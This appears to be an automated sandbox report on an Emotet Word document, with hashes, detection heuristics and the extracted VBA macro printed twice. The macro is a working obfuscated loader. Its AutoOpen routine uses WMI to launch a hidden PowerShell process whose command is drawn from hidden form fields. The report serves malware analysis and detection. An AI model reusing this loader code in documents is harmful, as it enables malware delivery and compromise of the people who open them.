Emotet Office (OLE) malware analysis — malicious · 741a1ec554f7f6aa

MALICIOUS

Office (OLE)

125.1 KB Created: 2019-05-22 07:01:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 630b5c45ab91553d147f1474717fa012 SHA-1: dd8752d4204e8792b9a3453e34c9980ebe09dbe2 SHA-256: 741a1ec554f7f6aa8a3f2d98391ac1cbbbcc41a2d5baee77255cd40cdb4390cf

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-10001946-0'. Static analysis reveals obfuscated VBA macros, including an 'autoopen' subroutine and calls to GetObject, indicative of a loader. The presence of VBA macros and the Emotet family attribution strongly suggest this document is a spearphishing attachment used to download and execute a second-stage payload.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3861 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3861 bytes
SHA-256: `42fcb9a17dbc93776d4aeab9cba4f57d715a4c757475b5cb5545021ce1a54601`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Swlfot9" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "bLJAPOF, 0, 0, MSForms, TextBox" Attribute VB_Control = "FbFMIBR, 1, 1, MSForms, TextBox" Attribute VB_Name = "zC7wlka" Sub K9hj1nG() Debug.Print "724" + ("516") + ("UPOp3Hrt" + ("23" + "361") + "vC9PPmCK" + ("rjITKvEv")) Debug.Print "20" + ("994") + ("u_8YY68" + ("791" + "454") + "rbk4PQH" + ("iqapjj9")) Debug.Print "942" + ("653") + ("pqQI0T2" + ("226" + "126") + "N7OT4k" + ("Z6j2ENjS")) Debug.Print "387" + ("127") + ("wjf7biL" + ("20" + "64") + "nE0OG8" + ("GNXHVKT")) Debug.Print "255" + ("590") + ("kPaztnd9" + ("626" + "534") + "nc7FkKV" + ("itIImYJ")) Debug.Print "763" + ("124") + ("lLo5VRP" + ("611" + "629") + "tJnnqa" + ("EPdjCjRp")) End Sub Sub _ autoopen( _ ) Debug.Print "588" + ("496") + ("Bn5Mps" + ("680" + "785") + "i9QMw62V" + ("w29iIrvf")) Debug.Print "984" + ("870") + ("ZavHKq" + ("723" + "615") + "HYijaGW" + ("MHILLpV")) Debug.Print "58" + ("974") + ("piKRd2" + ("450" + "645") + "jwOksk" + ("OoIvNiL")) lc8cJsPt Debug.Print "860" + ("836") + ("EYdLCWj" + ("544" + "391") + "w0whi5" + ("Mmcto3")) Debug.Print "12" + ("319") + ("b1Pp9wzc" + ("397" + "829") + "Xozjnt" + ("l2HkNCop")) Debug.Print "826" + ("309") + ("uz3s8R" + ("5" + "980") + "Z6jEJw" + ("MSGtCq")) End Sub Sub lc8cJsPt() Debug.Print "598" + ("292") + ("T7ADvF" + ("923" + "592") + "aoZhJ8" + ("QZ19JM")) Debug.Print "172" + ("61") + ("siqiBj" + ("244" + "548") + "CujarQ" + ("YCQYbV9p")) Debug.Print "481" + ("416") + ("tsilunn9" + ("628" + "880") + "bAMl1ZQ" + ("MliEdDUk")) Set vKdiFDQ0 = GetObject(DjJziuOh("wInmGmts:Wi" + DjJziuOh("n32_Processstartup"))) Debug.Print "870" + ("607") + ("PcbfVA" + ("33" + "751") + "ulTB9X0o" + ("GJHo8HLt")) Debug.Print "881" + ("790") + ("OlCaQq5" + ("430" + "915") + "dtB3Llk" + ("D3HJUw")) Debug.Print "564" + ("234") + ("tf3jUt" + ("987" + "539") + "mGw4qi" + ("N_ISFuRa")) vKdiFDQ0. _ ShowWindow = 456538 _ - 456538 Debug.Print "328" + ("217") + ("fdrwbw" + ("566" + "574") + "tGl2NZc7" + ("wGc2BFvt")) Debug.Print "869" + ("972") + ("iJBtYv" + ("737" + "700") + "uYPsi9" + ("sZdnXfA1")) Debug.Print "734" + ("337") + ("k5O2bczf" + ("19" + "700") + "ipMDmU" + ("NAGKkCzh")) Set TT9Nzj8 = GetObject(DjJziuOh("WinmGmts:Wi" + DjJziuOh("n32_Process"))) Debug.Print "235" + ("742") + ("ias4NGH" + ("880" + "381") + "TibBkm" + ("AWKlSj")) Debug.Print "846" + ("112") + ("iDDJFH" + ("967" + "689") + "pFKLwHzd" + ("adIqUP")) Debug.Print "494" + ("835") + ("T_BjwwH" + ("223" + "397") + "tYGR6M" + ("JsYl9wG6")) TT9Nzj8.Create jIR3nwEm + DjJziuOh("pOwe") + zlENFnFB + Swlfot9.FbFMIBR + Swlfot9.bLJAPOF + CfCOp_Y, k4uZjr6l, vKdiFDQ0, Y2kmwLH Debug.Print "934" + ("923") + ("kKcWD2UO" + ("842" + "1") + "V1R_GfNu" + ("YOq3ut9")) Debug.Print "551" + ("115") + ("HdZOorHc" + ("329" + "989") + "uo0d7lbt" + ("TrNqLHlR")) Debug.Print "292" + ("885") + ("NX3wcw" + ("83" + "277") + "vjzOvQB" + ("vwOGsB0f")) End Sub Function DjJziuOh(cwFTwl6w) Debug.Print "534" + ("499") + ("XbpWjXs" + ("372" + "541") + "FNrZjL2S" + ("MWYua4")) Debug.Print "780" + ("283") + ("ZjzMaKq" + ("713" + "625") + "TnMbb1Y2" + ("KPKNERmI")) Debug.Print "491" + ("933") + ("TZlai0Wf" + ("131" + "670") + "stLT_CY" + ("jRQn_W4")) DjJziuOh = PnnQz1 + cwFTwl6w + WfwjhXr Debug.Print "883" + ("685") + ("nlufjX" + ("437" + "868") + "jpH2151" + ("wzwJ5YHv")) Debug.Print "103" + ("92") + ("F7R7JO" + ("893" + "18") + "RBMWq4" + ("zUA83X8b")) Debug.Print "844" + ("104") + ("RwXijt2" + ("914" + "682") + "sb5cz9ht" + ("HIKHKE5")) End Function Attribute VB_Name = "pkqujot"

SHA-256: 42fcb9a17dbc93776d4aeab9cba4f57d715a4c757475b5cb5545021ce1a54601

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Swlfot9"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "bLJAPOF, 0, 0, MSForms, TextBox"
Attribute VB_Control = "FbFMIBR, 1, 1, MSForms, TextBox"

Attribute VB_Name = "zC7wlka"
Sub K9hj1nG()
   Debug.Print "724" + ("516") + ("UPOp3Hrt" + ("23" + "361") + "vC9PPmCK" + ("rjITKvEv"))
Debug.Print "20" + ("994") + ("u_8YY68" + ("791" + "454") + "rbk4PQH" + ("iqapjj9"))
Debug.Print "942" + ("653") + ("pqQI0T2" + ("226" + "126") + "N7OT4k" + ("Z6j2ENjS"))
   Debug.Print "387" + ("127") + ("wjf7biL" + ("20" + "64") + "nE0OG8" + ("GNXHVKT"))
Debug.Print "255" + ("590") + ("kPaztnd9" + ("626" + "534") + "nc7FkKV" + ("itIImYJ"))
Debug.Print "763" + ("124") + ("lLo5VRP" + ("611" + "629") + "tJnnqa" + ("EPdjCjRp"))
End Sub
Sub _
autoopen( _
)
   Debug.Print "588" + ("496") + ("Bn5Mps" + ("680" + "785") + "i9QMw62V" + ("w29iIrvf"))
Debug.Print "984" + ("870") + ("ZavHKq" + ("723" + "615") + "HYijaGW" + ("MHILLpV"))
Debug.Print "58" + ("974") + ("piKRd2" + ("450" + "645") + "jwOksk" + ("OoIvNiL"))
lc8cJsPt
   Debug.Print "860" + ("836") + ("EYdLCWj" + ("544" + "391") + "w0whi5" + ("Mmcto3"))
Debug.Print "12" + ("319") + ("b1Pp9wzc" + ("397" + "829") + "Xozjnt" + ("l2HkNCop"))
Debug.Print "826" + ("309") + ("uz3s8R" + ("5" + "980") + "Z6jEJw" + ("MSGtCq"))
End Sub
Sub lc8cJsPt()
   Debug.Print "598" + ("292") + ("T7ADvF" + ("923" + "592") + "aoZhJ8" + ("QZ19JM"))
Debug.Print "172" + ("61") + ("siqiBj" + ("244" + "548") + "CujarQ" + ("YCQYbV9p"))
Debug.Print "481" + ("416") + ("tsilunn9" + ("628" + "880") + "bAMl1ZQ" + ("MliEdDUk"))
Set vKdiFDQ0 = GetObject(DjJziuOh("wInmGmts:Wi" + DjJziuOh("n32_Processstartup")))
   Debug.Print "870" + ("607") + ("PcbfVA" + ("33" + "751") + "ulTB9X0o" + ("GJHo8HLt"))
Debug.Print "881" + ("790") + ("OlCaQq5" + ("430" + "915") + "dtB3Llk" + ("D3HJUw"))
Debug.Print "564" + ("234") + ("tf3jUt" + ("987" + "539") + "mGw4qi" + ("N_ISFuRa"))
vKdiFDQ0. _
ShowWindow = 456538 _
- 456538
   Debug.Print "328" + ("217") + ("fdrwbw" + ("566" + "574") + "tGl2NZc7" + ("wGc2BFvt"))
Debug.Print "869" + ("972") + ("iJBtYv" + ("737" + "700") + "uYPsi9" + ("sZdnXfA1"))
Debug.Print "734" + ("337") + ("k5O2bczf" + ("19" + "700") + "ipMDmU" + ("NAGKkCzh"))
Set TT9Nzj8 = GetObject(DjJziuOh("WinmGmts:Wi" + DjJziuOh("n32_Process")))
   Debug.Print "235" + ("742") + ("ias4NGH" + ("880" + "381") + "TibBkm" + ("AWKlSj"))
Debug.Print "846" + ("112") + ("iDDJFH" + ("967" + "689") + "pFKLwHzd" + ("adIqUP"))
Debug.Print "494" + ("835") + ("T_BjwwH" + ("223" + "397") + "tYGR6M" + ("JsYl9wG6"))
TT9Nzj8.Create jIR3nwEm + DjJziuOh("pOwe") + zlENFnFB + Swlfot9.FbFMIBR + Swlfot9.bLJAPOF + CfCOp_Y, k4uZjr6l, vKdiFDQ0, Y2kmwLH
   Debug.Print "934" + ("923") + ("kKcWD2UO" + ("842" + "1") + "V1R_GfNu" + ("YOq3ut9"))
Debug.Print "551" + ("115") + ("HdZOorHc" + ("329" + "989") + "uo0d7lbt" + ("TrNqLHlR"))
Debug.Print "292" + ("885") + ("NX3wcw" + ("83" + "277") + "vjzOvQB" + ("vwOGsB0f"))
End Sub
Function DjJziuOh(cwFTwl6w)
   Debug.Print "534" + ("499") + ("XbpWjXs" + ("372" + "541") + "FNrZjL2S" + ("MWYua4"))
Debug.Print "780" + ("283") + ("ZjzMaKq" + ("713" + "625") + "TnMbb1Y2" + ("KPKNERmI"))
Debug.Print "491" + ("933") + ("TZlai0Wf" + ("131" + "670") + "stLT_CY" + ("jRQn_W4"))
DjJziuOh = PnnQz1 + cwFTwl6w + WfwjhXr
   Debug.Print "883" + ("685") + ("nlufjX" + ("437" + "868") + "jpH2151" + ("wzwJ5YHv"))
Debug.Print "103" + ("92") + ("F7R7JO" + ("893" + "18") + "RBMWq4" + ("zUA83X8b"))
Debug.Print "844" + ("104") + ("RwXijt2" + ("914" + "682") + "sb5cz9ht" + ("HIKHKE5"))
End Function


Attribute VB_Name = "pkqujot"

Open this report in the interactive analyzer, or submit your own file for analysis.